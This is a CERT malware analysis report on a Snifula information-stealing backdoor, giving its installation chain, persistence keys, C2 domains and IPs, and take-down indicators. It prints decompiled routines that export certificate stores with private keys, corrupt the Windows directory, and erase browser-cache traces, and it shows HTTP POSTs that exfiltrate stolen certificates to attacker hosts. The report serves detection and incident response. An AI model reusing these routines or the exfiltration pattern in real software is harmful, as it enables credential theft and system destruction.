TLP:WHITE # Malware analysis report of a Backdoor.Snifula variant CIRCL - Computer Incident Response Center Luxembourg and National CERT of Luxembourg _41, avenue de la gare, 1611 Luxembourg, Luxembourg[⇤]_ (Dated: 2012-07-25 Initial version) (12-07-27 Updated domain intel) (12-09-12 Updated take-down) (13-05-29 Public release (TLP:WHITE)) # Abstract Trojan horses and particularly information stealing malware are a prevalent risk in information security. According to Symantec, Snifula is a family of information stealing trojan horses known since 2006 and the developers enhanced it over the years up to the current version (see Appendix for a history). The actual version is - like its predecessors - not spread very widely, but has some unusual and underestimated capabilities that go farther than stealing passwords or files from an infected computer. A main ability of the malware is the X.509 certificate stealing functionality, which is in its maliciousness beyond the usual information stealing scenarios and generally only considered being a theoretical attack in most organizations. This report shows that the threat is real and being used in targeted attacks - and that the attackers can reach this goal by using documented Windows functions only. _[⇤Electronic address: info@circl.lu; URL: http://www.circl.lu/](mailto:info@circl.lu)_ 1 ----- **Contents** **I. Introduction** 3 **II. Examined Files** 3 **III. Characteristics of the installation process** 6 **IV. Post-installation and runtime analysis** 8 A. Behavior 8 1. Anti-analysis 8 2. Pipe communication for Inter Process Communication 9 3. Registry interaction 9 4. Network behavior 9 5. Different actions performed on the network: 10 **V. Static analysis** 12 A. Snifula Command analysis 12 B. Details about specific commands: 13 1. Certificate stealing 13 2. Screenshot taking 14 3. Cookie, History and Internet cache stealing 15 4. Write executable modules 15 5. KILL - Corrupt Windows 15 6. SOCKS server 15 **VI. Observations** 16 A. General observations 16 B. Observations regarding hosts / IP addresses / registrars 16 **VII. Appendix** 19 A. History of Snifula 19 B. VirusTotal results 19 1. Detections for file 2a7.exe (as of 2012-07-22) 19 2. Detections for file dump_00E30000.bin 20 2 ----- 3. Detections for file dump_006D0000.bin 20 4. Detections for file ctfmreg.dll (as of 2012-07-22) 20 5. Detections for file ctfmreg64.dll 21 C. Interesting code parts 21 1. Corrupt Windows 21 2. Delete URL from URL Cache 21 D. Exports 22 1. ctfmreg.dll 22 2. dump_00E30000.bin 23 E. Involved hosts and AS numbers 23 F. Related domain information 27 G. Take-down 28 1. Registered domains 28 2. IP addresses 28 **I.** **INTRODUCTION** CIRCL has been involved in an international call to support a foreign CERT with the analysis of this particular malware. We have only been handed over an MD5 of the malware, which we were able to locate in and download from a malware database. During the work with this file, several files have been produced during different types of analysis. This report aims to give an overview of the entire chain, from installation to operation of the malware. **II.** **EXAMINED FILES** 1. File: 2a7.exe (a) Origin: VirusTotal (b) Function: Dropper (c) Checksums i. MD5: eaa5e4f26028c41ba3935a4ac455892c ii. SHA1: 049db2d7030bf7563974a2c25671aef046cabf99 3 ----- iii. SHA-256: 2a72d04024a37413d260c53433309f62e922736fae3b2e321f0cdfcb2927ccf7 2. File: dump_00E30000.bin (a) Origin: Dumped from a segment of 2a7.exe during dynamic analysis (b) Function: DLL, identified to be the decrypted ctfmreg.dll (see 4.) (c) Checksums i. MD5: a6bf4ae086b8d28612de4bc0d7ec4abe ii. SHA1: 2b6b4fbc77553425b00ee3135e2e83386ebd797f iii. SHA-256: e352a6e73b52096da9ef78e09b29f9b4b969264a0cb682a4dc9da976d260d0bd 3. File: dump_006D0000.bin (a) Origin: Dumped from a segment of 2a7.exe during dynamic analysis (b) Function: Installer (c) Checksums i. MD5: d819facd7c980b01bf44ea7efbf6af42 ii. SHA1: abfe4e74b345669a0fcd8a34bff9c9a0a7bc9c44 iii. SHA-256: f6cc42d577c25192282b4eddff3efebc8efefa4056b6939e14af17fd3e365722 4. File: ctfmreg.dll (a) Origin: File extracted while running dump_006D0000.bin (b) Function: Actual encrypted malware installed and running on a 32 bit Windows system (c) Checksums i. MD5: f9005fd7eb85a81f2f9b1474bba61be0 ii. SHA1: 89196b0ed3189e8571924144e57aa867f72164bd iii. SHA-256: 67d8a87c1361b9b3a150f1dcf05082f874ed316fde3aa5311b8b7ff93bbd09f2 5. File: ctfmreg64.dll (a) Origin: File extracted while running dump_006D0000.bin (with binary instrumenta tion) 4 ----- (b) Function: Actual encrypted malware installed and running on a 64 bit Windows system (c) Checksums i. MD5: edb1c6fa185dc818e9cf1d107974561a ii. SHA1: 383b76f23ac1d469a59a85af1a8d9c1d3f932e2f iii. SHA-256: 4384ec85f5d83e4d8e474e4899098787c513e0a42ff1047a28f5244448dce7f7 6. File: [8 decimals digits from GetTickCount()].bat (example: 41082546.bat) (a) Origin: File dropped while running dump_006D0000.bin (b) Function: Batch file to delete files after installation (c) Checksums for 41082546.bat i. MD5: d226a657b279c5fc0a892748230a56ff ii. SHA1: fa7e4fb6d6de3c4769001cbfce0a00ba02ef28a5 iii. SHA-256: 9dae2767b8e3499d37418a75ddd04d457c7ec8d6c8f312ee109c95a8a97e7761 5 ----- Memory (decrypted) dump_00E30000.bin _decrypted and encrypted_ _version of same file_ ctfmreg.dll Filesystem (encrypted) File 2a7.exe (dropper) runs dump_006D0000.bin, which drops - based on the underlying _•_ Windows environment - either the file ctfmreg.dll on a 32 bit system or ctfmreg64.dll on a 64 bit system into the directory c:\windows\system32\ and decrypts and loads is into memory (which was dumped as dump_00E30000.bin) The file is registered in _•_ HKLM\System\ CurrentControlSet \ Control \ Session Manager\ AppCertDlls \ on 32 bit Windows environments with the key:value pair mmcpapir : c :\ windows\ system32 \ ctfmreg . d l l or with the following pair on 64 bit Windows environments mmcpapir : c :\ windows\ system32 \ ctfmreg64 . d l l Initial startup is triggered via ShellExecute on _•_ r u n d l l 3 2 . exe ctfmreg . d l l, CreateProcessNotify Interestingly, analysis of the file ctfmreg.dll shows a list of 46 exported functions, from which solely this CreateProcessNotify is left after the internal decryption process. A possible intention of the malware author(s) might be to make the library look unsuspicious. On the 6 ----- other side the list of exports in this particular, unique combination qualifies pretty good as a detection signature. The false positive rate has not been evaluated, though. The file 41082546.bat (example filename) is started last. The filename is based on GetTick _•_ Count as input for %lu.bat where %lu is a format string. It removes the installation file and itself. The following pseudo code illustrates the process: _•_ 1 DWORD __stdcall main ( c o n s t CHAR ⇤ cmdLine ) 2 { 3 HMODULE_1 = GetModuleHandleA ( 0 ) ; 4 HMODULE_0 = GetModuleHandleA ( 0 ) ; 5 WindowsVersion = G e t V e r s i o n ( ) ; 6 c u r r e n t _ p r o c e s s _ i d = G e t C u r r e n t P r o c e s s I d ( ) ; 7 s h e l l _ e x e c u t e ( cmdLine ) ; 8 pMem = 0 ; memset(&v13, 0, 0 x18u ) ; 9 **i f** ( call_ Q ueryInformationTok en (&pMem) ) 10 { 11 **i f . . .** 12 **i f** ( w r i t e _ c t f m r e g _ d l l ( ) ) 13 { 14 E v e n t A t t r i b u t e s . nLength = 1 2 ; 15 E v e n t A t t r i b u t e s . b I n h e r i t H a n d l e = 0 ; 16 **i f . . .** 17 HEVENT = CreateEventA(& E v e n t A t t r i b u t e s, TRUE, FALSE, lpName ) ; 18 **i f** ( HEVENT ) 19 { 20 SetEvent (HEVENT) ; 21 S l e e p (2000 u ) ; 22 ResetEvent (HEVENT) ; 23 CloseHandle (HEVENT) ; 24 HRSRC32 = FindResourceA (0, "CLIENT32", 0xA ) ; 25 **i f** ( HRSRC32 ) 26 i n j e c t _ d e c r y p t e d _ r e s o u r c e _ i n t o _ b r o w s e r (HRSRC32, 0 x10 ) ; 27 **i f** ( check_wow64 ( c u r r e n t _ p r o c e s s _ i d ) ) 28 { 29 HRSRC64 = FindResourceA (0, "CLIENT64", 0xA ) ; 30 **i f** ( HRSRC64 ) 31 i n j e c t _ d e c r y p t e d _ r e s o u r c e _ i n t o _ b r o w s e r (HRSRC64, 0 x18 ) ; 32 } 33 HTIMER = CreateWaitableTimerA (& E v e n t A t t r i b u t e s, TRUE, lpTimerName ) ; 34 **i f . . .** 35 L o c a l F r e e ( E v e n t A t t r i b u t e s . l p S e c u r i t y D e s c r i p t o r ) ; 36 r e t = 0 ; 37 } 38 } 39 } 40 c r e a t e _ w r i t e _ e x e c u t e _ b a t c h _ f i l e ( ) ; 41 **i f** ( r e t == −1 ) 42 r e t = G e t L a s t E r r o r ( ) ; 43 **r e t u r n** r e t ; 44 } 7 ----- **IV.** **POST-INSTALLATION AND RUNTIME ANALYSIS** **A.** **Behavior** _1._ _Anti-analysis_ After the installation as described in section III., a ctfmreg.dll is loaded into explorer.exe. It takes care that ctfmreg.dll is loaded into every process that is started on the infected computer and by doing so it prevents basic investigation methods by not allowing various programs to start, like Sysinternals procmon.exe. "Procmon was unable to allocate sufficient memory to run. Try increasing the size of your page file." It also takes care that only Internet Explorer or Mozilla Firefox are used as a browser. Other browsers, particularly the following, are exited during startup: Opera _•_ Safari _•_ Chrome _•_ 8 ----- _2._ _Pipe communication for Inter Process Communication_ At this point in time, a communication pipe is established on the system. The pipe is part of the Inter Process Communication schema of the malware and used to execute commands. The pipe is built with this format string: \\.\ pipe \{%08x−%04x−%04x−%04x−%08x%04x} And was constant during our investigation. Nevertheless, there is an initialization factor that might change. In our tests the pipe’s name was the following: {370 a98c4−cd53 −7296−38fd−ec812a37fe5b } This pipe can be enumerated as a host signature, e.g. with Sysinternals pipelist. _3._ _Registry interaction_ The following Registry keys are set up in HKEY_CURRENT_USER\ Software \AppDataLow\{dd2706e2 −58d9−ec64 −3673− ca57d81d8ca1 } key ’k1’ with a 4 byte value reflecting the user id, which is created using the Windows API _•_ function CoCreateGuid() key ’k2’ with a 4 byte value which doesn’t seem to be used within this component _•_ key ’Version’ with the version number (currently 0x0c = 12) _•_ key ’s1’ with a 4 byte value which is created/used when the SOCKS functionality is turned _•_ on _4._ _Network behavior_ Only if a browser is opened, the network functions become active. Immediately when a browser is opened, the following hosts are queried with HTTP POSTs: wednesltr.com.tw _•_ masmitnd.com.tw _•_ 9 ----- financepfrro.com.tw _•_ Two backup IP addresses are also in the binary, but not seen to be queried: 200.46.204.8 _•_ 95.143.198.47 _•_ _5._ _Different actions performed on the network:_ 1. Upload of X.509 certificates: A function opens the certificate store, enumerates and exports all certificates and also the private keys, encrypts them with the password ’password’, compresses the file and sends it over the network: POST h t t p : / / w e d n e s l t r . com . tw/uda Content−Type : m u l t i p a r t /form−data ; boundary=−−−−−−−−−−−−−−−−−−−−−−−−−−1d7248c1d7248c1d7248c User−Agent : M o z i l l a /5.0 ( Windows NT 5 . 1 ; r v : 1 1 . 0 ) Gecko /20100101 F i r e f o x /11.0 Host : w e d n e s l t r . com . tw Content−Length : 246335 Connection : keep−a l i v e M u l t i p a r t form Form data : u p l o a d _ f i l e : PK . . . . . . . . . . . @. J . $ ( . . . . . . . . . . . AuthRoot . pfxUT . . . A.O.A.O.A.O . 7 . . . 0 . . . . . . . 0 . . . . . ? ⇤ . H . . . . . . . . . . . . . . . 0 . . . . 0 . . . . . ? ⇤ . H . . . . . . . . . . 0 . . . . . . . 0 . . . . . ? ⇤ . H . . [ . . . ] 2. Upload of basic environment information: POST h t t p : / / w e d n e s l t r . com . tw/uda Content−Type : m u l t i p a r t /form−data ; boundary=−−−−−−−−−−−−−−−−−−−−−−−−−−1d7248c1d7248c1d7248c User−Agent : M o z i l l a /5.0 ( Windows NT 5 . 1 ; r v : 1 1 . 0 ) Gecko /20100101 F i r e f o x /11.0 Host : w e d n e s l t r . com . tw Content−Length : 641 Connection : keep−a l i v e M u l t i p a r t form Form data : u p l o a d _ f i l e : OS: M i c r o s o f t Windows XP P r o f e s s i o n a l S e r v i c e Pack 3 ( b u i l d : 2600) ARCH: x86 32 b i t USER : Admin user_id : 153958625 v e r s i o n _ i d : 12 s y s : 1 (a) The server simply replies with ’ok!’ 3. Upload of basic software information: 10 ----- POST h t t p : / / masmitnd . com . tw/ ping Content−Type : a p p l i c a t i o n /x−www−form−u r l e n c o d e d User−Agent : M o z i l l a /5.0 ( Windows NT 5 . 1 ; r v : 1 1 . 0 ) Gecko /20100101 F i r e f o x /11.0 Host : masmitnd . com . tw Content−Length : 64 Connection : keep−a l i v e URLEncoded form user_id : 153958625 v e r s i o n _ i d : 12 s o c k s : 0 b u i l d : 32940 c r c : 00000000 (a) The server returns a file which appears to be a configuration file, gzip compressed and encrypted. This file also contains new instructions 4. Ask for command: POST h t t p : / / w e d n e s l t r . com . tw/ucommd Content−Type : a p p l i c a t i o n /x−www−form−u r l e n c o d e d User−Agent : M o z i l l a /5.0 ( Windows NT 5 . 1 ; r v : 1 1 . 0 ) Gecko /20100101 F i r e f o x /11.0 Host : w e d n e s l t r . com . tw Content−Length : 64 Connection : keep−a l i v e URLEncoded form user_id : 153958625 v e r s i o n _ i d : 12 s o c k s : 0 b u i l d : 32940 c r c : 00000000 (a) This HTTP POST request is executed regularly in a separate thread. It asks for a new command from the server and the response is evaluated and executed on the infected system. A complete list of possible commands is shown in the following chapter. 11 ----- **V.** **STATIC ANALYSIS** **A.** **Snifula Command analysis** External commands received via HTTP can be: EXE (261) _•_ DL_EXE (262) _•_ DL_EXE_ST (263) _•_ CLEAR_COOK (267) _•_ VER (-) _•_ REBOOT (259) _•_ KILL (264) _•_ GET_CERTS (265) _•_ GET_COOKIES (266) _•_ SOCKS_START (271) _•_ SOCKS_STOP (270) _•_ GET_LOG (-) _•_ These external commands are translated into internal commands. The control is set up to be performed via a named pipe. The number in brackets is the corresponding internal command sent via the named pipe to the receiving function. The malware uses the browser API to communicate with the servers. Here it uses the functionality of DeleteUrlCacheEntry() to delete the used URLs from the browser cache to delete traces. 271: SOCKS start _•_ 270: SOCKS stop _•_ 258: Find files (threaded) _•_ 12 ----- 259: Reboot Windows _•_ 260: Write file _•_ 261: Write executable module and execute _•_ 262: Write executable module _•_ 263: Write executable module and make it autostart _•_ 264: Corrupt windows directory and reboot computer _•_ 265: Start Certificate stealing thread _•_ 266: Start Cookie stealing thread _•_ 267: Copy Cookies, History and Internet Cache files _•_ 268: Write log _•_ 269: Read log _•_ Some of the internal commands are not mapped to external commands or they are part of an external command. **B.** **Details about specific commands:** _1._ _Certificate stealing_ The certificates of the certificate stores (shown in the following listing) are exported, including their private key. This is done in the function export_certificates: PFXExportCertStoreEx (HCERTSTORE, &pPFX, L" password ", 0, EXPORT_PRIVATE_KEYS) This exports the given certificate store, including the private keys, encrypting it with the password ’password’. 1 DWORD __stdcall c e r t s _ t h r e a d ( i n t a1 ) 2 { 3 temp = make_temp_file ( ) ; 4 i f ( temp ) 5 { 6 D e l e t e F i l e A ( temp ) ; 7 i f ( C r e a t e D i r e c t o r y A ( temp, 0) ) 13 ----- 8 { 9 e x p o r t _ c e r t i f i c a t e s ("My", temp ) ; 10 e x p o r t _ c e r t i f i c a t e s (" AddressBook ", temp ) ; 11 e x p o r t _ c e r t i f i c a t e s (" AuthRoot ", temp ) ; 12 e x p o r t _ c e r t i f i c a t e s (" C e r t i f i c a t e A u t h o r i t y ", temp ) ; 13 e x p o r t _ c e r t i f i c a t e s (" D i s a l l o w e d ", temp ) ; 14 e x p o r t _ c e r t i f i c a t e s (" Root ", temp ) ; 15 e x p o r t _ c e r t i f i c a t e s (" TrustedPeople ", temp ) ; 16 e x p o r t _ c e r t i f i c a t e s (" T r u s t e d P u b l i s h e r ", temp ) ; 17 e r r o r = create_file_and_add_to_send_list ( temp, 1 ) ; 18 f i l e _ o p e r a t i o n s ( temp, 1, 1 ) ; 19 RemoveDirectoryA ( temp ) ; 20 } 21 e l s e 22 { 23 e r r o r = G e t L a s t E r r o r ( ) ; 24 } 25 HeapFree ( hHeap, 0, temp ) ; 26 } 27 e l s e 28 { 29 e r r o r = 1006; 30 } 31 p F i l e = HeapAlloc ( hHeap, 0, 0 x400u ) ; 32 w s p r i n t f A ( p F i l e, " C e r t s ended with s t a t u s %u\n ", e r r o r ) ; 33 s i z e _ f i l e = l s t r l e n A ( p F i l e ) ; 34 pipe_process_command ( s i z e _ f i l e, 268, p F i l e ) ; 35 HeapFree ( hHeap, 0, p F i l e ) ; 36 r e t u r n e r r o r ; 37 } The certificate files are archived and compressed into a temporary file of the format [16 hex characters].tmp, they are written at C:\ Documents and S e t t i n g s\\Local S e t t i n g s \Temp Subsequently, another thread collects and uploads these files periodically, started within this function: create_thread_collect_upload_files () _2._ _Screenshot taking_ The malware contains functionality to take screenshots from the infected computer. In con trast to the outlined control schema via HTTP embedded commands from section V.a., the screenshot taking command is embedded within the encrypted file returned to the /ping command (see section IV.a.5.2). A screenshot is taken when the file contains the command “SCREEN SHOT”. The screenshot file is then uploaded. 14 ----- _3._ _Cookie, History and Internet cache stealing_ The malware collects all browser history and cache files from the browser folder and collects cookie files from Internet Explorer, Firefox and Macromedia Flash Player. The files are assembled and uploaded. _4._ _Write executable modules_ The malware can retrieve an additional executable file and either save it to \[filename].exe where filename is a decimal unsigned long repre _•_ sentation of the result of GetTickCount() save and run it _•_ save and make it autostart via _•_ HKCU\ Software \\ Microsoft \\Windows\\ CurrentVersion \\Run _5._ _KILL - Corrupt Windows_ When the malware receives the ’KILL’ command, the inode of the Windows directory is overwritten with the malware module and a reboot is triggered. Overwriting the windows directory renders the Windows installation unusable. _6._ _SOCKS server_ The malware is able to create a reverse connection to a server on the internet, basically able to act as a proxy server for the attacker. This functionality can be turned on dynamically on request. 15 ----- **VI.** **OBSERVATIONS** **A.** **General observations** This is a list of general observations regarding the capabilities of this malware Internet connections are proxy capable. Even username and passwords are read from the _•_ current browser configuration The combination of History stealing (targets), Cookies (authentication information), X.509 _•_ certificates (strong authentication) and acting as a proxy server for the attacker is consid ered a high risk and a serious threat to the confidentiality of information that are usually heavily protected and only accessible from defined networks. The malware uses Threads, Windows Events, Asynchronous Procedure Calls and Windows _•_ Pipe communication and appears to be well-written in terms of design and implementation including error handling. The malware writer(s) left a string of his build environment within the binary, that could _•_ be used for signatures: C:\ tmp\NRM−27_01_12\PDB\ client_x32 . pdb The encrypted file returned following the /ping command needs a deeper investigation, _•_ because it could contain more functionalities that are not covered in this analysis and could be done in a related future work. **B.** **Observations regarding hosts / IP addresses / registrars** The attacker has left a few traces by registering domains and using IP addresses. The network registry information is included in the Appendix and does not give any specific hints about the attacker, except that he has or had access to different hosts at IP addresses at various places in the world: CAT Telecom Public Company Ltd, Thailand _•_ Hurricane Electric, Inc ., USA _•_ 16 ----- AltNet, IP Kolobov Aleksandr Grigorievich, Ukraine _•_ HUB.ORG, Panama _•_ SERVERCONNECT, Sweden _•_ The domain registry information includes some interesting information that is worth to be men tioned here. The domains included in the binary wednesltr.com.tw _•_ masmitnd.com.tw _•_ financepfrro.com.tw _•_ share common elements: they are all registered the same day by the same “person” at the same registrar: R e g i s t r a n t : Aster Ltd Lu Bing−h s i a n aster@gmail . com +86.8457434354 +86.8457434354 No . 8, JiaXing Road, Antes Economic & T e c h n o l o g i c a l Development Area, Yantai, Shandong, China YanTai, ShanDong CN A d m i n i s t r a t i v e Contact : Lu Bing−h s i a n aster@gmail . com +86.8457434354 +86.8457434354 Technical Contact : Lu Bing−h s i a n aster@gmail . com +86.8457434354 +86.8457434354 Record e x p i r e s on 2013−03−06 (YYYY−MM−DD) Record c r e a t e d on 2012−03−06 (YYYY−MM−DD) Domain s e r v e r s i n l i s t e d o r d e r : ns3 . cnmsn . com ns4 . cnmsn . com R e g i s t r a t i o n S e r v i c e P r o v i d e r : WebCC Ltd . 17 ----- Interestingly, there are around 40 domains listed at domaintools.com which are all registered by the email address ’aster@gmail.com’. It would be no surprise if those domains are also used for malicious activities. These domains are included in the Appendix. 18 ----- **VII.** **APPENDIX** **A.** **History of Snifula** 2006 - Infostealer.Snifula.A: http://www.symantec.com/security_response/writeup.jsp?docid=2006 _•_ 072610-2145-99&tabid=2 2006 - Infostealer.Snifula.B: http://www.symantec.com/security_response/writeup.jsp?docid=2006 _•_ 110710-2700-99&tabid=2 2007 - Infostealer.Snifula.C: http://www.symantec.com/security_response/writeup.jsp?docid=2007 _•_ 051005-4518-99&tabid=2 2012 - Backdoor.Snifula.D: http://www.symantec.com/security_response/writeup.jsp?docid=2012 _•_ 062203-0431-99&tabid=2 **B.** **VirusTotal results** _1._ _Detections for file 2a7.exe (as of 2012-07-22)_ nProtect : Trojan . Generic .7361643 McAfee : Artemis ! EAA5E4F26028 K7AntiVirus : Trojan TheHacker : Trojan / Dropper . I n j e c t o r . d i s x V i r u s B u s t e r : Trojan .DR. I n j e c t o r ! wZtuXJUqECU NOD32: a v a r i a n t of Win32/ Kryptik .ACYX F−Prot : W32/ Trojan2 .NQMQ Symantec : WS. Reputation .1 Norman : W32/ I n j e c t o r . ACVI TrendMicro _−HouseCall :_ TROJ_SPNR.16 CI12 Avast : Win32 : Dropper−KLC [ Drp ] Kaspersky : Trojan _−Dropper . Win32 . I n j e c t o r . d i s x_ BitDefender : Trojan . Generic .7361643 Emsisoft : Trojan _−Dropper . Win32 . I n j e c t o r ! IK_ Comodo : U n c l a s s i f i e d M a l w a r e F−Secure : Trojan . Generic .7361643 VIPRE : Trojan . Win32 . Generic . pak ! cobra A n t i V i r : TR/Drop . I n j e c t o r . d i s x TrendMicro : TROJ_SPNR.16 CI12 McAfee−GW−E d i t i o n : Artemis ! EAA5E4F26028 Sophos : Troj /FakeAV−FGJ 19 ----- GData : Trojan . Generic .7361643 Commtouch : W32/ Trojan2 .NQMQ AhnLab−V3 : Dropper /Win32 . I n j e c t o r VBA32 : TrojanDropper . I n j e c t o r . d i s x I k a r u s : Trojan _−Dropper . Win32 . I n j e c t o r_ F o r t i n e t : W32/ I n j e c t o r . DISX ! t r AVG: Dropper . Generic5 .BODG Panda : Generic Trojan Scanned : 2012−04−19 12:29:10 − 42 scans − 29 d e t e c t i o n s (69.0%) _2._ _Detections for file dump_00E30000.bin_ No detections (as of 2012-07-22) _3._ _Detections for file dump_006D0000.bin_ No detections (as of 2012-07-22) _4._ _Detections for file ctfmreg.dll (as of 2012-07-22)_ McAfee : Generic PWS. y ! d2z K7AntiVirus : Riskware TheHacker : Trojan / Kryptik . wrl V i r u s B u s t e r : Trojan . Kryptik ! WjiRK5FHsos NOD32: a v a r i a n t of Win32/ Kryptik .WRL F−Prot : W32/Agent . IV . gen ! Eldorado Norman : W32/ Suspicious_Gen4 .VNDC Avast : Win32 : Kryptik −IAQ [ Trj ] Kaspersky : Backdoor . Win32 . Papras . f g i Comodo : U n c l a s s i f i e d M a l w a r e VIPRE : Trojan . Win32 . Generic !BT A n t i V i r : TR/Spy . U r s n i f .89 McAfee−GW−E d i t i o n : Generic PWS. y ! d2z Emsisoft : Trojan _−Spy . Win32 . U r s n i f ! IK_ M i c r o s o f t : TrojanSpy : Win32/ U r s n i f GData : Win32 : Kryptik −IAQ Commtouch : W32/Agent . IV . gen ! Eldorado AhnLab−V3 : Backdoor /Win32 . Papras I k a r u s : Trojan _−Spy . Win32 . U r s n i f_ F o r t i n e t : W32/FakeAV . FGJ ! t r AVG: Crypt .ARZV Scanned : 2012−05−03 16:25:11 − 40 scans − 21 d e t e c t i o n s (52.0%) 20 ----- _5._ _Detections for file ctfmreg64.dll_ No detections (as of 2012-07-22) **C.** **Interesting code parts** _1._ _Corrupt Windows_ 1 CHAR ⇤ __usercall corrupt_windows(DWORD t h i s , i n t a2) 2 { 3 CHAR ⇤ windows_directory ; // eax@1 MAPDST 4 LPSTR pStr ; // eax@2 5 c o n s t CHAR ⇤ d i r _ w i t h o u t _ d r i v e _ l e t t e r ; // e si @ 2 6 HANDLE h F i l e W i n d o w s D i r e c t o r y ; // esi@2 7 HMODULE h I n s t a n c e ; // eax@3 8 BOOL s u c c e s s ; // ebp@3 9 v o i d _⇤_ v9 ; // ecx@3 10 DWORD NumberOfBytesWritten ; // [ sp+0h ] [ bp−4h ] @1 11 NumberOfBytesWritten = t h i s ; 12 windows_directory = HeapAlloc ( hHeap, 0, MAX_PATH) ; 13 i f ( windows_directory ) 14 { 15 GetWindowsDirectoryA ( windows_directory, MAX_PATH) ; 16 pStr = StrChrA ( windows_directory, ’ : ’ ) ; 17 pStr [ 1 ] = 0 ; 18 d i r _ w i t h o u t _ d r i v e _ l e t t e r = pStr + 2 ; 19 w s p r i n t f A ( pStr + 2, "\\\\.\\% s ", windows_directory ) ; / / ’ \ \ . \ windows ’ 20 h F i l e W i n d o w s D i r e c t o r y = C r e a t e F i l e A ( d i r _ w i t h o u t _ d r i v e _ l e t t e r, RW_ALL, 3u, 0, OPEN_EXISTING, 0, 0 ) ; 21 i f ( h F i l e W i n d o w s D i r e c t o r y != −1 ) 22 { 23 h I n s t a n c e = GetModuleHandleA ( 0 ) ; // GetModuleHandle ( 0 ) g i v e s a h I n s t a n c e 24 s u c c e s s = W r i t e F i l e ( h F il e W in d o w s D ir e c to ry, h I n s t a n c e, 0 x10000u, &NumberOfBytesWritten, 0 ) ; 25 CloseHandle ( h F i l e W i n d o w s D i r e c t o r y ) ; 26 i f ( s u c c e s s ) 27 reboot_windows ( v9 ) ; 28 } 29 windows_directory = HeapFree ( hHeap, 0, windows_directory ) ; 30 } 31 r e t u r n windows_directory ; 32 } _2._ _Delete URL from URL Cache_ 1 **s i g n e d** **i n t** __stdcall delete_URL_from_UrlCache (LPCSTR URL) 2 { 3 HLOCAL hMem; _//_ _edi@1_ 4 HANDLE UrlCacheEntry ; _//_ _ebx@2_ 5 **s i g n e d** **i n t** r e t ; _//_ _[ sp+8h ]_ _[ bp−8h ] @1_ 6 DWORD c b C a c h e E n t r y I n f o ; _//_ _[ sp+Ch ]_ _[ bp−4h ] @1_ 7 r e t = 0 ; 8 c b C a c h e E n t r y I n f o = 4096; 9 hMem = L o c a l A l l o c (0 x40u, 0 x1000u ) ; 10 **i f** ( hMem ) 11 { 12 UrlCacheEntry = F i n d F i r s t U r l C a c h e E n t r y A (0, hMem, &c b C a c h e E n t r y I n f o ) ; 13 **i f** ( UrlCacheEntry ) 21 ----- 14 { 15 r e t = 1 ; 16 **do** 17 { 18 **i f** ( S t r S t r I A ( _⇤_ (hMem + 1), URL) ) 19 D e l e t e U r l C a c h e E n t r y ( _⇤_ (hMem + 1 ) ) ; 20 c b C a c h e E n t r y I n f o = 4096; 21 } 22 **w h i l e** ( FindNextUrlCacheEntryA ( UrlCacheEntry, hMem, &c b C a c h e E n t r y I n f o ) ) ; 23 F i n d C l o s e U r l C a c h e ( UrlCacheEntry ) ; 24 } 25 L o c a l F r e e (hMem ) ; 26 } 27 **r e t u r n** r e t ; 28 } **D.** **Exports** _1._ _ctfmreg.dll_ F l a g s : 00000000 Time stamp : Tue Mar 13 2 0 : 3 2 : 4 6 2012 V e r s i o n : 0 . 0 DLL name : c l i e n t . d l l O r d i n a l s base : 1 . (00000001) # o f A d d r e s s e s : 4 6 . (0000002E) # o f Names : 4 6 . (0000002E) 1 . 00011F9D C r e a t e P r o c e s s N o t i f y 2 . 000054B3 RefreshAppRegEnum 3 . 000028C6 D e s t r o y O v e r S t r u c t P o o l 4 . 0000223A S e r v e r G e t A p p l i c a t i o n T y p e 5 . 000066DC F r e e O v e r S t r u c t 6 . 0000451A OpenAppRegEnum 7 . 00006AA2 GetComputerObject 8 . 00005D02 C a l l B e g i n n i n g 9 . 00002C55 R e s e t C a l l C o u n t 1 0 . 0000583B OpenComponentLibraryOnStreamEx 1 1 . 000061B1 R e i n i t O v e r S t r u c t 1 2 . 00001881 SetActionLogModeSz 1 3 . 00006965 S e t S i l e n t 1 4 . 00005A12 OpenComponentLibraryEx 1 5 . 00008AC4 MonitorHandle 1 6 . 00001104 OpenComponentLibraryOnMemEx 1 7 . 00005DBD R e g i s t e r A p p l i c a t i o n 1 8 . 000030DB GetGlobalBabyJITEnabled 1 9 . 00006F0D SetUnimodemTimer 2 0 . 0000125B SetActionLogMode 2 1 . 000074B3 E x e c ut e Ac t io n 2 2 . 00006B9B StopMonitoringHandle 2 3 . 000026A4 SetSetupSave 2 4 . 00008E5B AppRegEnum 2 5 . 00008FC1 C r e a t e O v e r S t r u c t P o o l 2 6 . 00006097 CreateUnimodemTimer 2 7 . 00006B06 SetupSave 2 8 . 0000435D StartMonitorThread 2 9 . 00006104 DowngradeAPL 3 0 . 00005BDB Q u e r y A p p l i c a t i o n 3 1 . 00003991 UpdateFromAppChange 3 2 . 000072BC UpdateFromComponentChange 3 3 . 000055BE G e t S i m p l e T a b l e D i s p e n s e r 22 ----- 3 4 . 00005DB5 S y n c D e v i c e I o C o n t r o l 3 5 . 00008609 U m P l a t f o r m D e i n i t i a l i z e 3 6 . 0000275A CloseAppRegEnum 3 7 . 000010D4 U n r e g i s t e r A p p l i c a t i o n 3 8 . 00006937 StopMonitorThread 3 9 . 00007D16 SetSetupOpen 4 0 . 00008C1C C a l l E n d i n g 4 1 . 00007551 I n p r o c S e r v e r 3 2 F r o m S t r i n g 4 2 . 000062B8 CancelUnimodemTimer 4 3 . 000056C4 SetActionName 4 4 . 00005269 FreeUnimodemTimer 4 5 . 000040E1 S e t A c t i o n L o g F i l e 4 6 . 00007 E53 GetCatalogObject _2._ _dump_00E30000.bin_ F l a g s : 00000000 Time stamp : Tue Mar 13 2 0 : 3 2 : 4 6 2012 V e r s i o n : 0 . 0 DLL name : c l i e n t . d l l O r d i n a l s base : 1 . (00000001) # o f A d d r e s s e s : 1 . (00000001) # o f Names : 1 . (00000001) 1 . 00001872 C r e a t e P r o c e s s N o t i f y **E.** **Involved hosts and AS numbers** wednesltr.com.tw (122.155.165.122) _•_ inetnum : 122. 155. 160. 0 − 122.155.191.255 netname : CAT−IDC2−S e r v i c e d e s c r : CAT IDC2 14 th f l o o r country : TH admin−c : SC1450−AP tech _−c :_ CS416−AP s t a t u s : ALLOCATED NON−PORTABLE remarks : _⇤⇤⇤_ send spam abuse to support@idc . cattelecom . com⇤⇤⇤ n o t i f y : support@idc . cattelecom . com mnt−by : MAINT−TH−THIX−CAT mnt−lower : MAINT−TH−THIX−CAT mnt−r o u t e s : MAINT−TH−THIX−CAT mnt− i r t : IRT−CAT−TH changed : suchok@cat . net . th 20110112 source : APNIC person : support CAT IDC nic −hdl : 